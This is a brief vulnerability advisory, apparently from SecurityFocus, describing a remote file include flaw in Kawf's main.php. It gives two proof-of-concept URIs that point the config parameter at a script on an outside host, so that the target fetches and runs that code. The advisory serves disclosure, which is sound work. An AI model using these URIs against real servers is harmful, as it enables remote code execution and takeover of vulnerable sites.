Kawf Main.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
http://www.example.com/(path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?


 

Privacy Statement
Copyright 2010, SecurityFocus